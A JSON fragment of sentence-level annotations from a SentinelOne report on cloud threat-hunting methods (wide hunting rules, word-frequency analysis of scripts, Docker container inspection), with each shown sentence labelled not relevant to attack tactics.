}, { "uid": "sentinel-73_SentinelOne_report-p1-s41-44cd3b", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 41, "context_before": "The rule also filters for script file types, which are more likely to be associated with cloud attack tools.", "sentence_text": "Another wide hunting rule looks for references to popular cloud service providers (CSP) and URLs for Telegram channels.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s42-bcd9b2", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 42, "context_before": "Another wide hunting rule looks for references to popular cloud service providers (CSP) and URLs for Telegram channels.", "sentence_text": "This combination indicates that the tool is conducting suspicious behavior by nature of using Telegram and that it is cloud focused by referencing a CSP.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s43-677276", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 43, "context_before": "This combination indicates that the tool is conducting suspicious behavior by nature of using Telegram and that it is cloud focused by referencing a CSP.", "sentence_text": "Wide hunting rules often generate much noise, and the CSP Telegram rule was no exception.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s44-3d1b68", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 44, "context_before": "Wide hunting rules often generate much noise, and the CSP Telegram rule was no exception.", "sentence_text": "Conclusion\nIn this workshop at LABScon24 , I provided aspiring cloud researchers with several approaches that they can use as an entry point into cloud threat research and hunting.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s45-eb7370", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 45, "context_before": "Conclusion\nIn this workshop at LABScon24 , I provided aspiring cloud researchers with several approaches that they can use as an entry point into cloud threat research and hunting.", "sentence_text": "Using the Word Frequency Analysis approach is extremely helpful for analyzing huge scripts with thousands of lines of code.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s46-a98e19", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 46, "context_before": "Using the Word Frequency Analysis approach is extremely helpful for analyzing huge scripts with thousands of lines of code.", "sentence_text": "Similarly, the targeted keyword approach helps identify areas of a script that perform crucial cloud-centric activities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s47-918fc6", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 47, "context_before": "Similarly, the targeted keyword approach helps identify areas of a script that perform crucial cloud-centric activities.", "sentence_text": "A similar approach could be used to identify CSP APIs when searching for a specific action.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s48-5c1d89", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 48, "context_before": "A similar approach could be used to identify CSP APIs when searching for a specific action.", "sentence_text": "For investigations involving a container that is not running in a live environment, Docker Desktop remains a solid starting point to identify features of the container and to extract details that provide insight into the container’s capabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s49-b5ef98", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 49, "context_before": "For investigations involving a container that is not running in a live environment, Docker Desktop remains a solid starting point to identify features of the container and to extract details that provide insight into the container’s capabilities.", "sentence_text": "Threat hunting in the cloud is different from hunting binaries, as many malware researchers primarily do.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s50-85dfeb", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 50, "context_before": "Threat hunting in the cloud is different from hunting binaries, as many malware researchers primarily do.", "sentence_text": "The broad threat hunting approach can be noisy and time-consuming, but it has yielded many new findings that may have otherwise gone unseen.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s51-69234c", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 51, "context_before": "The broad threat hunting approach can be noisy and time-consuming, but it has yielded many new findings that may have otherwise gone unseen.", "sentence_text": "Interested in attending or presenting at LABScon25?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s52-bd9214", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 52, "context_before": "Interested in attending or presenting at LABScon25?", "sentence_text": "Learn more\nhere\nMalware Analysis\nShare\nAlex Delamotte\nAlex's passion for cybersecurity is humbly rooted in the early aughts, when she declared a vendetta against a computer worm.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s53-4a862d", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 53, "context_before": "Learn more\nhere\nMalware Analysis\nShare\nAlex Delamotte\nAlex's passion for cybersecurity is humbly rooted in the early aughts, when she declared a vendetta against a computer worm.", "sentence_text": "Alex enjoys researching the intersection of cybercrime and state-sponsored activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s54-0e81dc", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 54, "context_before": "Alex enjoys researching the intersection of cybercrime and state-sponsored activity.", "sentence_text": "She relentlessly questions why actors pivot to a new technique or attack surface.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s55-6dfd34", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 55, "context_before": "She relentlessly questions why actors pivot to a new technique or attack surface.", "sentence_text": "In her spare time, she can be found DJing or servicing her music arcade games.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s56-b71608", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 56, "context_before": "In her spare time, she can be found DJing or servicing her music arcade games.", "sentence_text": "Prev\nChina’s Influence Ops | Twisting Tales of Volt Typhoon at Home and Abroad Next BlueNoroff Hidden Risk | Threat Actor Targets Macs with Fake Crypto News and Novel Persistence Related Posts Prompts as Code & Embedded Keys | The Hunt for LLM-Enabled Malware September 19 2025 FreeDrain Unmasked | Uncovering an Industrial-Scale Crypto Theft Network May 08 2025 X Phishing | Campaign Targeting High Profile Accounts Returns, Promoting Crypto Scams January 31 2025", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null } ]